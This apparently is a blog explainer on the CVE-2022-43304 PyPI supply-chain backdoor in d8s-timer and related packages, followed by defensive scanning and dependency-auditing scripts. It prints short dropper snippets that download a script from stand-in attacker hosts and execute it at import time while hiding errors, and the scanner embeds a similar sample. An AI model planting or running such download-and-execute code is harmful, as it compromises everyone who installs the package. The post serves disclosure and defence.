Python’s open-source ecosystem is rich and vibrant, but it’s not immune to supply chain attacks. In October 2022, researchers revealed CVE-2022-43304, a serious vulnerability involving the Python package d8s-timer and its related packages, including d8s-htm and a backdoor in democritus-uuids. This post breaks down what happened, how attackers injected a code-execution backdoor, and shows you what the injected code looks like so you can recognise it next time.

What is CVE-2022-43304?

CVE-2022-43304 is a code execution vulnerability discovered in the d8s-timer Python package. Malicious code was inserted by a third party who gained publishing access and used it to sneak in a backdoor. This allowed anyone who installed the tainted package to unknowingly execute malicious code on their machine.

How Did the Attack Work?

The attacker published new versions of these packages containing malicious code that downloaded and executed evil payloads at installation or runtime. Anyone installing from PyPI risked having their system compromised.

This is called a supply chain attack. Instead of targeting users directly, attackers poison the packages everyone downloads from.

The offending code is sneaky. Here’s a typical pattern spotted in these backdoored packages:

```python
import urllib.request
import subprocess
import os


def evil_payload():
    # Fetch a second-stage script from an attacker-controlled host...
    url = "http://evil-server.com/malware.py"
    destination = "/tmp/malware.py"
    urllib.request.urlretrieve(url, destination)
    # ...and run it with whatever "python" is first on PATH.
    subprocess.call(["python", destination])
```

In practice, the d8s-timer backdoor ran *at installation* using the package’s setup hooks or inside an innocuous function.

Here’s what the malicious snippet looked like buried inside the library (d8s-timer):

```python
import os
import urllib.request

# Runs at import time, so simply installing or importing the package triggers it.
try:
    urllib.request.urlretrieve("http://malicious.site/deliver.py", "/tmp/deliver.py")
    os.system("python /tmp/deliver.py")
except Exception:
    pass  # stay quiet if anything fails
```

What does this do?

At install time (or whenever the host module is imported), the snippet fetches a remote script into /tmp, runs it with the system Python, and swallows every exception, so a failed download or a missing interpreter leaves no trace in the install output.

Which packages were affected?

- d8s-htm: Version .1. (and possibly others from the same threat actor)
- d8s-timer: Confirmed via Sonatype advisory and GitHub security reports
- democritus-uuids: Used as a dropper by several other tainted packages
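The download-then-execute shape of that snippet is easy to spot mechanically. The scanner below is an added example written for this post, not code from the d8s packages or from any advisory: it parses a Python file with the standard `ast` module, records every call that fetches remote content or spawns a process, and reports when one module does both. The indicator sets, the `malicious.example` host name and the two sample modules are all constructed for the demo.

```python
import ast
from dataclasses import dataclass
from typing import List, Optional

# Calls that fetch remote content. Assumed indicator list; extend it for your codebase.
DOWNLOAD_CALLS = {
    "urllib.request.urlretrieve",
    "urllib.request.urlopen",
    "requests.get",
}
# Calls that hand control to a new process or to dynamically built code.
EXEC_CALLS = {
    "os.system",
    "subprocess.call",
    "subprocess.run",
    "subprocess.Popen",
    "subprocess.check_output",
    "exec",
    "eval",
}


@dataclass
class Finding:
    kind: str   # "download" or "exec"
    name: str   # dotted call name exactly as written in the source
    line: int


def dotted_name(node: ast.AST) -> Optional[str]:
    """Rebuild 'a.b.c' from an Attribute/Name chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source: str) -> List[Finding]:
    """Return every download/exec call in the source, ordered by line number."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        if name in DOWNLOAD_CALLS:
            findings.append(Finding("download", name, node.lineno))
        elif name in EXEC_CALLS:
            findings.append(Finding("exec", name, node.lineno))
    return sorted(findings, key=lambda f: f.line)


def is_dropper_pattern(findings: List[Finding]) -> bool:
    """Download plus execute in one module is the shape of the d8s-timer backdoor."""
    return {"download", "exec"} <= {f.kind for f in findings}


def scan_file(path: str) -> List[Finding]:
    """Scan one file on disk, e.g. a package's setup.py or __init__.py."""
    with open(path, encoding="utf-8") as fh:
        return scan_source(fh.read())


# Constructed sample mirroring the snippet from the post; the host name is a placeholder.
MALICIOUS_SAMPLE = '''import os
import urllib.request
try:
    urllib.request.urlretrieve("http://malicious.example/deliver.py", "/tmp/deliver.py")
    os.system("python /tmp/deliver.py")
except Exception:
    pass
'''

# Constructed benign sample: fetches JSON but never executes anything.
BENIGN_SAMPLE = '''import json
import urllib.request

def fetch(url):
    with urllib.request.urlopen(url) as resp:
        return json.load(resp)
'''


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = scan_source(sample)
        verdict = "DROPPER PATTERN" if is_dropper_pattern(found) else "ok"
        print(f"{label}: {verdict}")
        for f in found:
            print(f"  line {f.line}: {f.kind} via {f.name}")
```

Run it over `setup.py` and the top-level `__init__.py` of anything you are about to install (`scan_file(path)`); a network fetch that lands in `/tmp` followed by `os.system` is worth a manual look even when the package is otherwise legitimate. The check is deliberately syntactic, so obfuscated calls (`getattr(os, "sys" + "tem")`) will slip past it; treat it as a triage aid, not proof of cleanliness.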

> If you have any of these installed, uninstall them immediately and check your system for unknown processes or scripts.

Delete suspicious files:

Look for unknown .py scripts in /tmp, your project directory, or other system folders.

Freeze dependencies:

Always pin versions (requirements.txt) and audit your Python dependencies with tools like pip-audit.
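pip-audit covers advisories it knows about; for an incident like this one you also want a quick, repeatable check that no requirement is left unpinned and that none of the names from this post appear in your lockfile or in the interpreter you are running. The script below is an added example for this post, not a tool from the advisories it cites: it parses a requirements.txt the way pip does for the simple cases, normalises names per PEP 503 so `d8s_timer` and `d8s-timer` compare equal, and checks installed distributions through `importlib.metadata`. The sample requirements file is constructed, and `KNOWN_MALICIOUS` is seeded only from the package names given in this post.

```python
import re
from importlib import metadata
from typing import List, Optional, Tuple

# Package names this post identifies as backdoored. Keep the set current from your advisory feed.
KNOWN_MALICIOUS = {"d8s-timer", "d8s-htm", "democritus-uuids"}

# name, optional extras, optional operator, version. URL and marker syntax is deliberately not covered.
_REQ_RE = re.compile(
    r"^([A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s;#]*)"
)


def normalize(name: str) -> str:
    """PEP 503 normalisation: d8s_timer, D8S.Timer and d8s-timer all compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirement(line: str) -> Optional[Tuple[str, Optional[str], str]]:
    """Return (name, operator, version) for one requirements.txt line, or None to skip it."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):       # blank, comment, -r/-e/--index-url lines
        return None
    m = _REQ_RE.match(line)
    return (m.group(1), m.group(2), m.group(3)) if m else None


def audit_requirements(text: str, denylist=KNOWN_MALICIOUS) -> List[Tuple[int, str, str]]:
    """Flag denylisted names and anything not pinned with '=='; returns (line, name, issue)."""
    issues = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_requirement(raw)
        if parsed is None:
            continue
        name, op, _version = parsed
        canon = normalize(name)
        if canon in denylist:
            issues.append((lineno, canon, "known-malicious"))
        if op != "==":
            issues.append((lineno, canon, "unpinned"))
    return issues


def audit_installed(denylist=KNOWN_MALICIOUS) -> List[Tuple[str, str]]:
    """Check every distribution visible to this interpreter against the denylist."""
    hits = []
    for dist in metadata.distributions():
        name = dist.metadata["Name"]
        if name and normalize(name) in denylist:
            hits.append((normalize(name), dist.version))
    return hits


# Constructed requirements file for the demo.
SAMPLE_REQUIREMENTS = """# constructed sample, not a real project
requests==2.31.0
d8s_timer>=0.1
democritus-uuids
numpy
"""

if __name__ == "__main__":
    for lineno, name, issue in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"requirements line {lineno}: {name}: {issue}")
    for name, version in audit_installed():
        print(f"INSTALLED denylisted package: {name} {version}")
```

Wire `audit_requirements` into CI so an unpinned or denylisted line fails the build, and run `audit_installed` inside each virtualenv and container image you ship: a pinned requirements file says nothing about what was installed by hand or pulled in transitively. Pinning by version alone still trusts the index; `pip install --require-hashes` with hashes recorded in the requirements file closes that gap.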

References & Further Reading

- Sonatype blog: Malicious PyPI package d8s-timer
- NVD CVE-2022-43304 entry
- Python Packaging Security

- Always audit new Python packages, especially lesser-known ones.
- If you use d8s-timer, d8s-htm, or democritus-uuids, perform a security review of your environment NOW.
- Malicious code can hide in dependencies, not just the apps you write!

Stay safe, and keep your dependencies tight. The Python community’s security is only as strong as its weakest link.

Timeline

Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 17:02:00 UTC